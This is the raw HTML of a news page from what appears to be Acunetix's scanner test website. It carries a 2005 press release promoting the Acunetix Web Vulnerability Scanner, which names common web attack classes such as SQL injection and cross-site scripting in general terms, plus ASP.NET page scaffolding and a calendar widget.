          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a 